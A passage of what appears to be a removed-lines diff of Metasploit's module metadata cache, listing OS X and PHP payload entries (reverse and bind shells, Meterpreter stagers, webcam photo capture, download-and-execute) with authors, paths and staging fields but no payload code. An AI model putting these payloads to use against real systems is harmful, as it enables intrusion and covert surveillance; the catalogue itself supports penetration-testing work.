"osx/x64/dupandexecve/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/dupandexecve", - "stager_refname": "osx/x64/reverse_tcp_uuid" - }, - "payload_osx/x64/exec": { - "name": "OS X x64 Execute Command", - "fullname": "payload/osx/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "argp ", - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/exec.rb", - "is_install_path": true, - "ref_name": "osx/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/meterpreter/bind_tcp": { - "name": "OSX Meterpreter, Bind TCP Stager", - "fullname": "payload/osx/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr", - "nemo " - ], - "description": "Inject the mettle server payload (staged).\n\nListen, read length, read buffer, execute", - "references": [ - "URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/meterpreter", - "stager_refname": "osx/x64/bind_tcp" - }, - "payload_osx/x64/meterpreter/reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Stager", - "fullname": "payload/osx/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr", - "nemo " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect, read length, read buffer, execute", - "references": [ - "URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/meterpreter", - "stager_refname": "osx/x64/reverse_tcp" - }, - "payload_osx/x64/meterpreter/reverse_tcp_uuid": { - "name": "OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)", - "fullname": "payload/osx/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "parchedmind", - "nologic", - "timwr" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker with UUID Support (OSX x64)", - "references": [ - "URL-https://github.com/CylanceVulnResearch/osx_runbin", - "URL-https://github.com/nologic/shellcc" - ], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-02-16 13:56:50 +0000", - "path": "/modules/payloads/stagers/osx/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x64/meterpreter", - "stager_refname": "osx/x64/reverse_tcp_uuid" - }, - "payload_osx/x64/meterpreter_reverse_http": { - "name": "OSX Meterpreter, Reverse HTTP Inline", - "fullname": "payload/osx/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/meterpreter_reverse_https": { - "name": "OSX Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/osx/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/meterpreter_reverse_tcp": { - "name": "OSX Meterpreter, Reverse TCP Inline", - "fullname": "payload/osx/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/say": { - "name": "OS X x64 say Shellcode", - "fullname": "payload/osx/x64/say", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "Say an arbitrary string outloud using Mac OS X text2speech", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/say.rb", - "is_install_path": true, - "ref_name": "osx/x64/say", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/shell_bind_tcp": { - "name": "OS X x64 Shell Bind TCP", - "fullname": "payload/osx/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "Bind an arbitrary command to an arbitrary port", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/shell_find_tag": { - "name": "OSX Command Shell, Find Tag Inline", - "fullname": "payload/osx/x64/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "Spawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/shell_find_tag.rb", - "is_install_path": true, - "ref_name": "osx/x64/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x64/shell_reverse_tcp": { - "name": "OS X x64 Shell Reverse TCP", - "fullname": "payload/osx/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/bundleinject/bind_tcp": { - "name": "Mac OS X Inject Mach-O Bundle, Bind TCP Stager", - "fullname": "payload/osx/x86/bundleinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a custom Mach-O bundle into the exploited process.\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/bundleinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/bundleinject", - "stager_refname": "osx/x86/bind_tcp" - }, - "payload_osx/x86/bundleinject/reverse_tcp": { - "name": "Mac OS X Inject Mach-O Bundle, Reverse TCP Stager", - "fullname": "payload/osx/x86/bundleinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a custom Mach-O bundle into the exploited process.\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/bundleinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/bundleinject", - "stager_refname": "osx/x86/reverse_tcp" - }, - "payload_osx/x86/exec": { - "name": "OS X Execute Command", - "fullname": "payload/osx/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "snagg ", - "argp ", - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/exec.rb", - "is_install_path": true, - "ref_name": "osx/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/isight/bind_tcp": { - "name": "Mac OS X x86 iSight Photo Capture, Bind TCP Stager", - "fullname": "payload/osx/x86/isight/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/isight/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/isight", - "stager_refname": "osx/x86/bind_tcp" - }, - "payload_osx/x86/isight/reverse_tcp": { - "name": "Mac OS X x86 iSight Photo Capture, Reverse TCP Stager", - "fullname": "payload/osx/x86/isight/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/isight/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/isight", - "stager_refname": "osx/x86/reverse_tcp" - }, - "payload_osx/x86/shell_bind_tcp": { - "name": "OS X Command Shell, Bind TCP Inline", - "fullname": "payload/osx/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/shell_find_port": { - "name": "OS X Command Shell, Find Port Inline", - "fullname": "payload/osx/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "osx/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/shell_reverse_tcp": { - "name": "OS X Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/vforkshell/bind_tcp": { - "name": "OS X (vfork) Command Shell, Bind TCP Stager", - "fullname": "payload/osx/x86/vforkshell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nListen, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/vforkshell", - "stager_refname": "osx/x86/bind_tcp" - }, - "payload_osx/x86/vforkshell/reverse_tcp": { - "name": "OS X (vfork) Command Shell, Reverse TCP Stager", - "fullname": "payload/osx/x86/vforkshell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nConnect, read length, read buffer, execute", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/vforkshell", - "stager_refname": "osx/x86/reverse_tcp" - }, - "payload_osx/x86/vforkshell_bind_tcp": { - "name": "OS X (vfork) Command Shell, Bind TCP Inline", - "fullname": "payload/osx/x86/vforkshell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Listen for a connection, vfork if necessary, and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/vforkshell_reverse_tcp": { - "name": "OS X (vfork) Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/x86/vforkshell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Connect back to attacker, vfork if necessary, and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_perl": { - "name": "PHP Command Shell, Bind TCP (via Perl)", - "fullname": "payload/php/bind_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent)", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_perl.rb", - "is_install_path": true, - "ref_name": "php/bind_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_perl_ipv6": { - "name": "PHP Command Shell, Bind TCP (via perl) IPv6", - "fullname": "payload/php/bind_perl_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent) over IPv6", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_perl_ipv6.rb", - "is_install_path": true, - "ref_name": "php/bind_perl_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_php": { - "name": "PHP Command Shell, Bind TCP (via PHP)", - "fullname": "payload/php/bind_php", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "diaul " - ], - "description": "Listen for a connection and spawn a command shell via php", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_php.rb", - "is_install_path": true, - "ref_name": "php/bind_php", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_php_ipv6": { - "name": "PHP Command Shell, Bind TCP (via php) IPv6", - "fullname": "payload/php/bind_php_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "diaul " - ], - "description": "Listen for a connection and spawn a command shell via php (IPv6)", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_php_ipv6.rb", - "is_install_path": true, - "ref_name": "php/bind_php_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/download_exec": { - "name": "PHP Executable Download and Execute", - "fullname": "payload/php/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Download an EXE from an HTTP URL and execute it", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/download_exec.rb", - "is_install_path": true, - "ref_name": "php/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/exec": { - "name": "PHP Execute Command ", - "fullname": "payload/php/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Execute a single system command", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/exec.rb", - "is_install_path": true, - "ref_name": "php/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/meterpreter/bind_tcp": { - "name": "PHP Meterpreter, Bind TCP Stager", - "fullname": "payload/php/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp" - }, - "payload_php/meterpreter/bind_tcp_ipv6": { - "name": "PHP Meterpreter, Bind TCP Stager IPv6", - "fullname": "payload/php/meterpreter/bind_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp_ipv6" - }, - "payload_php/meterpreter/bind_tcp_ipv6_uuid": { - "name": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support", - "fullname": "payload/php/meterpreter/bind_tcp_ipv6_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp_ipv6_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp_ipv6_uuid" - }, - "payload_php/meterpreter/bind_tcp_uuid": { - "name": "PHP Meterpreter, Bind TCP Stager with UUID Support", - "fullname": "payload/php/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection with UUID Support", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp_uuid" - }, - "payload_php/meterpreter/reverse_tcp": { - "name": "PHP Meterpreter, PHP Reverse TCP Stager", - "fullname": "payload/php/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/reverse_tcp" - }, - "payload_php/meterpreter/reverse_tcp_uuid": { - "name": "PHP Meterpreter, PHP Reverse TCP Stager", - "fullname": "payload/php/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/reverse_tcp_uuid" - }, - "payload_php/meterpreter_reverse_tcp": { - "name": "PHP Meterpreter, Reverse TCP Inline", - "fullname": "payload/php/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Connect back to attacker and spawn a Meterpreter server (PHP)", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "php/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/reverse_perl": { - "name": "PHP Command, Double Reverse TCP Connection (via Perl)", - "fullname": "payload/php/reverse_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 